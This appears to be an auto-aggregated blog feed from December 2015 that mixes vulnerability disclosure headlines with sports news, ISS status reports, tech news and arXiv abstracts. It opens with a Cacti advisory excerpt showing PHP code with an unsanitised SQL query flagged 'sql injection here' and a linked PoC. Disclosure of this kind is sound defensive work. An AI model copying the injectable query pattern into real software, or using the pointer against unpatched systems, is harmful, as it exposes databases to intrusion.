input_validate_input_number(get_request_var_request("graph_start")); input_validate_input_number(get_request_var_request("graph_end")); /* ==================================================== */ line 158
\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631 $rra["timespan"] = 86400; }else{ /* get a list of RRAs related to this graph */ $rras = get_associated_rras($local_graph_id); if (sizeof($rras) > 0) { foreach ($rras as $unchosen_rra) { /* the timespan specified in the RRA "timespan" field may not be accurate */ $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]); /* make sure the current start/end times fit within each RRA's timespan */ if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) { /* is this RRA better than the already chosen one? */ if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) { $rra = $unchosen_rra; }else if (!isset($rra)) { $rra = $unchosen_rra; } } } } if (!isset($rra)) { $rra["rows"] = 600; $rra["steps"] = 1; } } }else{ // sql injection here $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id"); } [Exploit] poc: http://ift.tt/1Nc02x6

Source: Gmail -> IFTTT-> Blogger

[FD] Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability

================================================================ Symfony CMS 2.6.3 – Multiple Cross-Site Scripting Vulnerability ================================================================ Information

Source: Gmail -> IFTTT-> Blogger

Orioles: Baltimore offering 1B Chris Davis a 7-year deal, around $150M - Buster Olney; would be biggest in team history (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] [CORE-2015-0014] - Microsoft Windows Media Center link file incorrectly resolved reference

ISS Daily Summary Report – 12/8/15

Microbiome:  For Yui’s Return Minus Zero day (R-0) and Kelly’s Flight Day 240 Microbiome sessions, they each collected saliva samples today.  Kelly also collected water from the Potable Water Dispenser (PWD) in the galley and stowed it for ambient return on the 43 Soyuz (43S) vehicle, which is scheduled to undock from the ISS this Friday.  Microbiome investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).   Observation and Analysis of Smectic Islands in Space (OASIS) Sample Exchange:  Kelly exchanged the OASIS samples in the Microgravity Science Glovebox (MSG) today.  Kelly was able to restore full functionality to the slide drawer mechanism yesterday, which allowed this activity to be performed today. OASIS studies the unique behavior of liquid crystals in microgravity, including their overall motion and the merging of crystal layers known as smectic islands. Liquid crystals are used for display screens in televisions and clocks, and they also occur in soaps and cell membranes. The experiment allows detailed studies of the behavior of these structures, and how microgravity affects their unique ability to act like both a liquid and a solid crystal.   Japanese Experiment Module (JEM) Airlock Operations for Robotics Refueling Mission (RRM):  Yui has  depressurized and vented the JEM Airlock today in preparation the retrieval later this month of RRM Task Board 4 from the ExPRESS Logistics Carrier-4 (ELC-4), located on the ISS Starboard 3 (S3) Truss.   Twins Study:  In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collection and also made a urine collection.  This investigation is an integrated compilation of ten different studies led by multiple investigators.  The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains earth-bound for that same year.  The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.   Habitability:  Today Kelly documented his recent observations related to human factors and habitability for the Habitability investigation.  Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission’s duration impacts how much space crew members need.   Sleep Log:  Kornienko recorded a Sleep Log entry today after waking. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Journals:  Kelly completed a Journals entry today. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used by astronauts during extended-duration missions. Study results provide information used in preparations for future missions to low-Earth orbit and beyond.   Cygnus Arrival Preparation:  The USOS Crew reviewed the Cygnus rendezvous timeline and material associated with Cygnus retreat protocol, Cygnus lighting, navigation sensors, and camera settings.  Once their review was complete, they participated in a conference with specialist on the ground to answer any questions.   43S Crew Departure Preparation:  Yui and Lindgren prepared and transfered US cargo that will be returning to the ground via 43S.  They also continued to pack their personal items. The personal items will return by way of 43S, SpaceX-8, and SpaceX-9 vehicles.  Finally, Yui worked with Kononenko to perform a Motion Control Test on 43S.  The 43S Crew is scheduled to return to earth on December 11th.   43S Nominal Descent Drill #2:  Yui, Lindgren and Kononenko all participated in a nominal Soyuz Decent Drill.  As part of this training they reviewed preliminary undocking and descent data, then worked through the descent timeline (from Soyuz activation through post-landing activities).   Portable Computer System (PCS) Hardware Audit:  Kelly performed a periodic audit of PCS hardware today.  During the activity he took note of serial numbers for all deployed PCS shells, batteries, 1553 cards and cables. The information was then downlinked for ground teams to track.   Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Sample Collection Morning Inspection. SM ПСС [Caution & Warning Panel] Test SLEEP – Questionnaire HRF – Sample Collection and Prep for Stowage Insertion HRF – Sample MELFI Insertion Acoustic Dosimeter Reminder JEMAL – Depress and Vent ВКС Laptops Antivirus Scan Check and Status Report CORRECTSIA. Logging Liquid and Food (Medication) Intake MORZE. Psycho-physiological Evaluation: Cattell’s Test Acoustic Dosimeter Setup SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start) HAM radio session from Columbus USOS Window Shutter Closure Collect SM and FGB Air Samples Using АК-1М Sampler VIBROLAB. Monitoring hardware activation Monthly Inspection of T2 Treadmill System On-orbit hearing assessment using EARQ Progress 428 (DC1) Stowage Ops with IMS Support Review of Cygnus Capture Day Key Reminders ИПД Air Sample Collection for Ammonia in SM Cygnus Rendezvous Operations Conference HMS Defibrillator Inspection JEMAL- Closeout Verification JEMAL – JEM Ailock Vent Confirmation Post-Exercise Hygiene Procedure Soyuz 717 СУД Test No.2 Before Undocking Video Footage of Greetings / r/g 0816 HABIT – Experiment Ops WRS – Recycle Tank Fill Soyuz 717 АСУ Activation On MCC GO ISS Repress from ТКГ 428 (DC1) СрПК Section 1 – initiate Prepack US hardware to be loaded into Soyuz Microgravity Science Glovebox (MSG) Activation CORRECTSIA. Logging Liquid and Food (Medication) Intake On MCC GO ISS O2 Repress from ТКГ 428 (DC1) СРПК Section 1 – terminate INTERACTION-2. Experiment Ops Emergency Roles and Responsibilities Review Prepack US hardware to be loaded into Soyuz 43S SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup […]

from ISS On-Orbit Status Report http://ift.tt/1PZ2SJH
via IFTTT

It Works! Google's Quantum Computer is '100 Million Times Faster' than a PC

Announcing the results of its experiment, Google says Quantum Computer is More than 100 Million times faster than a regular PC. Two years ago, Google and NASA (National Aeronautics and Space Administration) bought a D-Wave 2X quantum computer, which they have been experimenting at the U.S. space agency's Ames Research Center in Mountain View, California for the past two years. The goal


from The Hacker News http://ift.tt/1YYspE6
via IFTTT

Watch the World's First Mind-Controlled Car in Action

When automobiles giant like Nissan, Toyota and Tesla are focusing on self-driving smart cars, Chinese researchers have taken the future of automotive car driving technology to the level that's beyond your imaginations. Chinese researchers have built what they claim is the World's First Mind-Controlled Car — that uses nothing but human’s brain power to drive. Isn't that sound like a


from The Hacker News http://ift.tt/1R9zH6s
via IFTTT

Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney

Just hours after the Australian man 'Craig Steven Wright' outed as the possible real identity of Satoshi Nakamoto, the anonymous creator of Bitcoin, Australian Police raided his home in Sydney. Over 10 police officers raided Wright's home in the Sydney suburbs on Wednesday afternoon. They forcefully opened the door, and 'started searching the cupboards and surfaces of the garage.'


from The Hacker News http://ift.tt/1HUmcFa
via IFTTT

Bitcoin Creator 'Satoshi Nakamoto' Unmasked! An Australian Man 'Craig Wright' identified...

Yes, Satoshi Nakamoto, the mysterious creator of the Bitcoin digital cryptocurrency has possibly been identified as an Australian entrepreneur, according to investigations independently done by Wired and Gizmodo. His name is Craig Steven Wright… ...at least based on some convincing evidence shown by both the publications. Bitcoin is a revolutionary virtual currency developed around


from The Hacker News http://ift.tt/1HUieMD
via IFTTT

Anonymous threat diverts Air France flight to Montreal

Anonymous threat diverts Air France flight to Montreal. Dec. 08, 2015 - 0:29 - Threat ruled a false alarm, this is the third such incident in recent weeks.

from Google Alert - anonymous http://ift.tt/1NUxADl
via IFTTT

Icelandic Legends and Aurora


Legends collide in this dramatic vista of land, sea, and sky. The land is Iceland, specifically Vík í Mýrdal, a southern village known for its beautiful black sand beaches. The sea, the Atlantic Ocean, surrounds Reynisdrangar, a sea stack of eroded basaltic rock pillars that Icelandic folklore tells are the petrified remains of trolls once attempting to drag a three-masted ship onto land. Watching from overhead and shining bright on the upper right is the god of the sky, according to Greek mythology: the planet Jupiter. Also visible in the sky are several other Greek legends encapsulated as constellations, including a lion (Leo), a big bear (Ursa Major), and a water snake (Hydra). One might guess that all of this commotion caused the spectacular aurora pictured -- but really it was just explosions from the Sun. via NASA http://ift.tt/1TXUTuT

Tuesday, December 8, 2015

Sensitivity analysis, multilinearity and beyond. (arXiv:1512.02266v1 [cs.AI])

Sensitivity methods for the analysis of the outputs of discrete Bayesian networks have been extensively studied and implemented in different software packages. These methods usually focus on the study of sensitivity functions and on the impact of a parameter change to the Chan-Darwiche distance. Although not fully recognized, the majority of these results heavily rely on the multilinear structure of atomic probabilities in terms of the conditional probability parameters associated with this type of network. By defining a statistical model through the polynomial expression of its associated defining conditional probabilities, we develop a unifying approach to sensitivity methods applicable to a large suite of models including extensions of Bayesian networks, for instance context-specific and dynamic ones, and chain event graphs. By then focusing on models whose defining polynomial is multilinear, our algebraic approach enables us to prove that the Chan-Darwiche distance is minimized for a certain class of multi-parameter contemporaneous variations when parameters are proportionally covaried.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1M21BcZ
via IFTTT

Learning Discrete Bayesian Networks from Continuous Data. (arXiv:1512.02406v1 [cs.AI])

Real data often contains a mixture of discrete and continuous variables, but many Bayesian network structure learning and inference algorithms assume all random variables are discrete. Continuous variables are often discretized, but the choice of discretization policy has significant impact on the accuracy, speed, and interpretability of the resulting models. This paper introduces a principled Bayesian discretization method for continuous variables in Bayesian networks with quadratic complexity instead of the cubic complexity of other standard techniques. Empirical demonstrations show that the proposed method is superior to the state of the art. In addition, this paper shows how to incorporate existing methods into the structure learning process to discretize all continuous variables and simultaneously learn Bayesian network structures.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1M21CgY
via IFTTT

Stochastic And-Or Grammars: A Unified Framework and Logic Perspective. (arXiv:1506.00858v2 [cs.AI] UPDATED)

Stochastic And-Or grammars (AOG) extend traditional stochastic grammars of language to model other types of data such as images and events. In this paper we propose a representation framework of stochastic AOGs that is agnostic to the type of the data being modeled and thus unifies various domain-specific AOGs. Many existing grammar formalisms and probabilistic models in natural language processing, computer vision, and machine learning can be seen as special cases of this framework. We also propose a domain-independent inference algorithm of stochastic context-free AOGs and show its tractability under a reasonable assumption. Furthermore, we provide an interpretation of stochastic context-free AOGs as a subset of first-order probabilistic logic, which connects stochastic AOGs to the field of statistical relational learning. Based on the interpretation, we clarify the relation between stochastic AOGs and a few existing statistical relational models.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1MiLJ8p
via IFTTT

On-the-Job Learning with Bayesian Decision Theory. (arXiv:1506.03140v2 [cs.AI] UPDATED)

Our goal is to deploy a high-accuracy system starting with zero training examples. We consider an "on-the-job" setting, where as inputs arrive, we use real-time crowdsourcing to resolve uncertainty where needed and output our prediction when confident. As the model improves over time, the reliance on crowdsourcing queries decreases. We cast our setting as a stochastic game based on Bayesian decision theory, which allows us to balance latency, cost, and accuracy objectives in a principled way. Computing the optimal policy is intractable, so we develop an approximation based on Monte Carlo Tree Search. We tested our approach on three datasets---named-entity recognition, sentiment classification, and image classification. On the NER task we obtained more than an order of magnitude reduction in cost compared to full human annotation, while boosting performance relative to the expert provided labels. We also achieve a 8% F1 improvement over having a single human label the whole set, and a 28% F1 improvement over online learning.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1TcnYUd
via IFTTT

Fast Convergence of Regularized Learning in Games. (arXiv:1507.00407v4 [cs.GT] UPDATED)

We show that natural classes of regularized learning algorithms with a form of recency bias achieve faster convergence rates to approximate efficiency and to coarse correlated equilibria in multiplayer normal form games. When each player in a game uses an algorithm from our class, their individual regret decays at $O(T^{-3/4})$, while the sum of utilities converges to an approximate optimum at $O(T^{-1})$--an improvement upon the worst case $O(T^{-1/2})$ rates. We show a black-box reduction for any algorithm in the class to achieve $\tilde{O}(T^{-1/2})$ rates against an adversary, while maintaining the faster rates against algorithms in the class. Our results extend those of [Rakhlin and Shridharan 2013] and [Daskalakis et al. 2014], who only analyzed two-player zero-sum games for specific algorithms.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1JB6JcL
via IFTTT

[FD] MacOS/iPhone/Apple Watch/Apple TV libc File System Buffer Overflow

Hi @ll, Today Apple fixed buffer overflow issue in LIBC/FTS (CVE-2015-7039). Patch available for: - OS X El Capitan v10.11 and v10.11.1 - iPhone 4s and later, - Apple Watch Sport, Apple Watch, Apple Watch Edition, and Apple Watch Hermes - Apple TV (4th generation) Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: Multiple buffer overflows existed in the C standard library. These issues were addressed through improved bounds Conception and description of issue here: http://ift.tt/1PKWYKs Best Regards, Maksymilian Arciemowicz (http://cert.cx) https://cxsecurity.com - Independent Information

Source: Gmail -> IFTTT-> Blogger

Anonymous declares this Friday 'ISIS trolling day'

Activist hacking group Anonymous have declared this Friday December 11 a “trolling day” against the so-called terrorist group Islamic State (ISIS) as ...

from Google Alert - anonymous http://ift.tt/1lMrBDI
via IFTTT

Ravens: Baltimore (4-8) drops five spots to No. 30 in Week 14 NFL power rankings; open here for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 12/7/15

Orbital ATK (OA)-4 Launch:  The Enhanced Cygnus spacecraft was successfully launched from Cape Canaveral, Florida atop a United Launch Alliance Atlas V Rocket on Sunday at 3:44pm CST.  Sunday’s launch sets the stage for ISS rendezvous and capture on Wednesday, December 9th.  Cygnus will be delivering approximately 3,500 kg of pressurized cargo to the ISS.   Microgravity Science Glovebox (MSG) Troubleshooting:  Kelly and Yui performed troubleshooting to restore the MSG slide mechanism to proper alignment today. The slide mechanism initially malfunctioned on November 17th, preventing the work volume from being extended for crew access.   Microbiome:  For his Return Minus Zero day (R-0) Microbiome session, Yui collected saliva samples Saturday, Sunday and today.  Microbiome investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).   Fine Motor Skills:  One year crewmembers Kelly and Kornienko each completed a session of the Fine Motor Skills experiment today.  During the experiment they performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.   Twins Study:  In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collections.  This investigation is an integrated compilation of ten different studies led by multiple investigators.  The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains earth-bound for that same year.  The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.   Veg-01:  On Saturday Kelly refilled the Veg-01 plant pillows with water.  Lindgren also refilled them today. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Sleep Log:  Both Kelly and Kornienko recorded Sleep Log entries Saturday and Sunday after waking.  Kornienko also recorded an entry this morning.  The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Crew Departure Preparation:  Yui and Lindgren continued packing their personal items in preparation for crew return to Earth on Soyuz 43 (43S) on December 11th. The items will return by way of 43S, SpX-8, and SpX-9 vehicles.   Today’s Planned Activities All activities were completed unless otherwise noted. TWIN – Sample Collection SM ПСС (Caution & Warning Panel) Test Inspection of СМ-У, РУ2, РУ4, РУ5 connector on [МНР-НС] separator pump Acoustic Dosimeter Reminder SLEEP – Questionnaire HRF – Sample MELFI Insertion Work Prep CORRECTSIA. Logging Liquid and Food (Medication) Intake Charging GoPro HERO3 Camcorder Battery Acoustic Dosimeter Setup Return item stowage in Soyuz #717 FINEMOTR- Experiment execution Experiment Fine Motor Skills Crew Departure Prep Searching for cable PS-120 Exercise Data Downlink via OCA BODYM – Measurements for the experiment ИП-1 sensors positioning check MPEP Platform – Fasteners maintenance LBNP Training (PRELIMINARY) Auxiliary Laptop Anti-Virus Update Sony HVR-Z7ECamcorder Setup in SM Charging GoPro HERO3 Camcorder Battery – terminate EXPRESS-1 – Install DVD with s/w for payload ARED – Flywheel cylinder evacuation VEG-01- Filling water to plant pillow Video camera GoPro HERO3 Prep for ТК 717 Descent Recording. Camera Adjustment. Tagup with specialists EML gas valve opening Installation of “Relocation and TORU” simulator SW version 1.11 on RSK1 Laptop. Tagup with specialists as necessary (S-band) Columbus cargo consolidation – Part 1 of  3 Soyuz 717 Samsung Tablet Charge – initiate WRS – Water samples analysis Columbus cargo consolidation – Part 2 of  3 [Deferred] Filling (separation) EDV-SV lid 1002 p.37 (00053403R, ФГБ1ПГО_1_107) CORRECTSIA. Logging Liquid and Food (Medication) Intake Soyuz #717 Return Cargo Stowage Ops ALGOMETRIA. Experiment Ops IMAX – H/w final packing and stowage for return EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement HMS – Psychological Questionnaire СОЖ Maintenance Columbus cargo consolidation – Part 3 of  3 [Deferred] PILOT-T. Experiment Ops EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement Sony HVR-Z7E Camcorder Power Off in SM) VSG box trouble shooting Cleaning ПФ1, ПФ2 Dust Filters and В1, В2, Fan Screens in MRM2 Tightening of QD Screw Clamps between DC1 and Progress 428 PILOT-T. Closeout Ops MPEG2 Video Test prior to ТПК 719 (45S) Docking VIZIR. Experiment Ops VSG box trouble shooting Soyuz #717 Samsung tablet charging – terminate Evening Work Prep EXPRESS 1 – Installation of DVD with s/w for payload – disk replacement INTERACTION-2. Experiment Ops TOCA – Data Recording EXPRESS 1-  Installation of DVD with s/w for payload – disk replacement EHS – BOSE head set quality evaluation ( S/N 1013, 1023 и 1024.) Replacement of FGB Dust Collector ПС1, ПС2 Filters (ФГБ1ПГО_4_419_1, bag 429-16 (00068131R)). Discard the removed items. Reflect changes in IMS Daily Planning Conference (S-band) Reading Reminder about saliva samples installation in MELFI CORRECTSIA. Logging Liquid and Food (Medication) Intake Reading Reminder about saliva sampling Preparing for Antivirus scan on Auxiliary Computer Laptops Reading Reminder about saliva samples installation in MELFI HABIT – Reading Reminder Reading Reminder about saliva sampling IMS Delta File Prep Personal Data Prep for Return Installation of inserts to ease opening of SM interior panel latches (Prepare “Элементы конструкции” (Structural Elements) kit (004890R), ФГБ1ПГО_4_427_1, […]

from ISS On-Orbit Status Report http://ift.tt/1ICjwMz
via IFTTT